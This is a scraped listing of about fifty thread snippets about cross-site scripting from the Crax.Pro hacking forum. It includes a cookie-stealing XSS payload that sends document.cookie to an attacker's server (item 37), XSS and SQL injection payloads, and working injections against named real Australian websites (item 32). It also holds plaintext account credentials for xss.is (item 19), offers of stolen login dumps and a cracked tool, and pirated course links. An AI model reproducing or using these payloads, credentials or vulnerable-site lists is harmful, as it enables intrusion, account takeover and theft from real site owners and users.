Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

  1. tronny

    Udemy - Master XSS(Cross Site Scripting) for real world Applications

    Udemy - Master XSS(Cross Site Scripting) for real world Applications 2-2024, by Anurag Verma *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  2. testy

    Brute Logic - XSS Cheat Sheet pdf

    Download https://mega.nz/file/wSMmCKgK#3RCiwlTC6sV3pvuZ3j8K4_IZypeR7EUZyvW-aUSdSWU
  3. cpu source

    Xss tutorial for beginners [Scripts | Step by Step | Pictures]

    What is XSS? XSS is website vulnerability, which allows you modify website source code. Only if vulnerability is persistent/stored, it can modify permanently website source code. There is 3 type of xss vulnerability; non-persistent, persistent and DOM Based. Non-persistent The non-persistent...
  4. Mengdie

    MASTER IN HACKING WITH XSS CROSS SITE SCRIPTING

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  5. wwwganguang

    Multi/Others  Gr3eNoX Exploit Scanner SQLI/XSS/LFI/RFI v.10

    下载: [回复] https://www.mediafire.com/folder/tt2c9f534ave8/Gr3eNoXExploitScanner [/回复]
  6. R3dDr4g0n

    Login:Pass  Private Cloud - XSS.IS #4 x201

    From my private cloud. Some lines may be broken. Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  7. R3dDr4g0n

    Login:Pass  Private Cloud - XSS.IS #3 x400

    From my private cloud. Some lines may be broken. Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  8. R3dDr4g0n

    Login:Pass  Private Cloud - XSS.IS #2 x400

    From my private cloud. Some lines may be broken. Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  9. R3dDr4g0n

    Login:Pass  Private Cloud - XSS.IS #1 x400

    From my private cloud. Some lines may be broken. Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  10. C

    XSS Attacks - Cross Site Scripting Exploits and Defense 💼

    https://mega.nz/file/3XJCyD5C#qAda14pWUjd5u4wjOYmzCI52UMa1rUFulh7V0kBGZk8
  11. xhack8562

    UHQ TOOLS Gr3eNoX Exploit Scanner SQLI/XSS/LFI/RFI v.10

    Link: https://www.mediafire.com/folder/tt2c9f534ave8/Gr3eNoXExploitScanner Password Unrar is 1 UHQ TOOLS Gr3eNoX Exploit Scanner SQLI/XSS/LFI/RFI v.10 [/REPLY]
  12. matezdr

    MiraI Ey3 CRACKED from xss.is

    1. unpack 2. run mirai crack xss.is 3. upack archive mirai 4. run mirai 5. enjoy rar pass: xss.is Link: https://ufile.io/ecohwzis [Paste your content here. Remove this line and one below!] [DO NOT PASTE THE CONTENT ABOVE OR BELOW THE REPLY QUOTES] [/REPLY]
  13. xrahitel

    Microsoft Office XSS attack

    Office XSS attack
  14. fabloay

    Lee's Web Hacking (XSS , SQL Injection) / UDEMY

    https://www.udemy.com/course/lees-web-hacking-cross-site-scripting-sql-injection/
  15. jackjakc

    large xss attack sheet sheet

    https://gist.githubusercontent.com/kurobeats/9a613c9ab68914312cbb415134795b45/raw/c24dd91dd91c324ae5c28b124aa4d379dbcb8e59/xss_vectors.txt
  16. trapperbob

    Combo Tools  (XSS) SourceForge

    SourceForge is a web-based source code repository. It acts as a centralized location for software developers to control and manage free and open source software development. It was the first to offer that service for free to open source projects. Exploit: SourceForge – Cross Site Scripting...
  17. tronny

    Udemy - XSS Survival Guide, by Wesley Thijs & J.Xavier Zaioczkowski

    Udemy - XSS Survival Guide, by Wesley Thijs & J.Xavier Zaioczkowski *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  18. tronny

    INE - Web Application Penetration Testing XSS Attacks, Alexis Ahmed

    INE - Web Application Penetration Testing XSS Attacks, Alexis Ahmed *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  19. amrxamr

    xss.is acounts for free

    hk111:31kbwb@G https://xss.is montana411:OccyOctopus86 https://xss.is/register/ Cybersecuritysoldiers:1@2@3@4@5@6 https://xss.is/register/ raimis70:xxraimisxx https://xss.is/login/login hk111:uplvl@Ls_$ https://xss.is/register/
  20. chaoscra

    Reflected XSS to steal cookies (JS Code)

    You can use this in combination with the other XSS cookie stealing script (Python) i posted earlier *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  21. chaoscra

    XSS cookie stealer (Python backend)

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  22. chaoscra

    XSS Filter Evasion tricks

    Some creative ways to bypass XSS filters: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  23. asad786

    🔥BUG BOUNTY COURSE 2023

    🔥BUG BOUNTY COURSE 2023 🐹Topic👁 ⏩ Introduction To Bug Bounty ⏩Our Virtual Lab Setup ⏩Website Enumeration & Information Gathering ⏩Introduction To Burpsuite ⏩HTML Injection ⏩Command Injection_Execution ⏩Broken Authentication ⏩Bruteforce Attacks ⏩Sensitive Data Exposure ⏩Broken Access Control...
  24. R

    Bug  Joomla JLex Review 6.0.1 - Reflected XSS

    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum...
  25. R

    Bug  PHPJabbers Taxi Booking 2.0 - Reflected XSS

    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials GET parameter 'index' is vulnerable to RXSS *** Hidden text: You do not have sufficient...
  26. User3Name

    Book "XSS Street-Fight" Black Hat

    In this book you can learn about the diferent forms of the use XSS Contain: - XSS Street-Fight • Input Validation − Whitelist Filtering − Blacklist Filtering − Generic Attack Payload Detection • Identify Output Handling Flaws − Missing...
  27. clusapva

    SQLi in website input

    Verify sqli in website input place or website parameter..... '+sleep(15)+' adding true condition ' and 'a'='a adding false condition ' and 'a'='b print(10)
  28. clusapva

    Source Code  Xss Script for promt.ml

    Xss Script for promt.ml "><script>alert(1)</script> <img src=x onerror=alert(1)// <script>alert`1`</script> --!><script>alert(1)</script> "type=image src onerror ="alert(5) "><svg/a=#"onload='/*#*/prompt(1)'
  29. irfanaspl

    Others  7TB of logs 2021 - 2022 Shared in xss forum

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  30. bananasplit

    200+ websites invulnerable for XSS attacks

    Here are som vulnerable websites. I'm not using them, so maybe you can!
  31. bananasplit

    Random websites vulnerable for XSS attacks | Freebies | crax.pro

    And here are some more XSS sites from different countries. Hope you like it!
  32. bananasplit

    Some Australian websites vulnerable for XSS. Enjoy!

    undefinedhttps://www.shpromotions.com.au/promo/www/product/productinfo.php?scd="><script >alert(String.fromCharCode(88,83,83))</script>&printed=1&name=Calico Shopping Bag wgusset https://promolink.com.au/promo/www/product/productinfo.php?name="><script...
  33. 0dayhacker

    Multi/Others  WordPress Stop Spammers Plugin - log XSS

    WordPress Plugin Stop Spammers 2021.8 - log Reflected Cross-site Scripting (XSS) # Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ # Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip # Version: <= 2021.8 # Tested on...
  34. Rip_Real_Worldd

    Gr3eNoX SQL_LFI_LFI Fuzz_RFI_XSS Dork seracher and tester

    Virus Deleted SQL_LFI_LFI Fuzz_RFI_XSS Dork seracher and tester Sory for my englsh First print dork and click search and find afther click start so scanning it will scan for open and if it is open it will come to the right if you dont serach you IP banned fix for reboot your wifi *** Hidden...
  35. By_Assassin

    What is Cross-Site Scripting(XSS)?

    XSS (Cross-Site Scripting) is a web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. It occurs when a web application does not properly validate, sanitize, or encode user-supplied input and includes it in the output dynamically...
  36. Rvso

    TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)

    #Application: TinyWebGallery #Version: v2.5 #Bugs: Stored Xss #Technology: PHP #Vendor URL: http://www.tinywebgallery.com/ #Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest #Date of found: 07-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux *** Hidden text...
  37. percnlean

    xss basic attack

    -XSS - Ex. ---- -Basic xss attacks: ex. *Cookie Stealing XSS: <script>document.write('<img src="http://<Your IP>/Stealer.php?cookie=' %2B document.cookie %2B '" >');<script> *Forcing the Download of a File: <script>var link = document.createElement('a'); link.href =...
  38. F0rS3c

    Mastering Payloads for Web Application Security

    As a bug bounty hunter, you must be aware of different types of payloads that you can use to test the vulnerabilities of web applications. Among these, XSS, LFI, REC, and SQL injection are the most commonly used payloads. In this blog, we will discuss 4 different payloads that can be used for...
  39. William N Nguyen

    Leaked-🧨XSS Attacks Cross Site Scripting Exploits and Defense ("E-BOOKS ")🧨

    BOOK-LINK:https://mega.nz/file/3XJCyD5C#qAda14pWUjd5u4wjOYmzCI52UMa1rUFulh7V0kBGZk8 Happy Hacking ;)
  40. readyman7

    Others  PDF | XSS Cheat Sheet

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  41. DevoUraq

    XSS CHEAT SHEET 2020 PDF EDITION

    The Greatest Ebook In This Business Enjoy ! Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  42. anon66

    Hacking is So Easy and No Code Needed...... XSS Sqli LFI

    XSS or Sqli or LFI or ........ just like sqlidumper 10.3 the clean version and i just use GAU (or) amass + paramspider gather links (then) use notepad ++ use Find-What: / (then) Replace with: \n/ (then) search-mode: Extended and *Replace*ALL-BUTTON (see photo) // people think you need magic...
  43. 4zzzzz

    ⚡XSS CHEATSHEET⚡CROSS SITE SCRIPT LIKE A PRO⚡

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  44. EditerTR

    XSS useful links

    Here I have listed very useful XSS things XSS is a vulnerability basically XSS ENCODER: http://evuln.com/tools/xss-encoder/ XSS Payloads: https://github.com/payloadbox/xss-payload-list XSS Filters: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
  45. aprildummy12

    Bypassing Cloudflare WAF: XSS via SQL Injection

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Telegram Channel: https://t.me/cashout_ways123
  46. simpleios

    XSS CHEATSHEET 2023

    https://anonfiles.com/ZaMd97Xane
  47. J

    xss cheetsheet latest 2023

    https://anonfiles.com/ZaMd97Xane
  48. drudown500

    Cross Site Scripting (XSS)

    Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each...
  49. CodeBoss

    Script/Site  RFI XSS Vulnerability

    Hello Guys New Tool For Scanning Website If RFI Vulnerability Or Not Image One - https://imgur.com/a/GjoidDl Image Two - https://imgur.com/a/0yGmYVM VirusTotal Result - https://virustotal.com/gui/file/3d4b967df3cfb25e7968222adb0422d4c399836e3539c2d9a37fdabe616629cc Download Link -...
  50. кнαη

    XSS + Vulnerability Exploitation & Website Hacking

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Top Bottom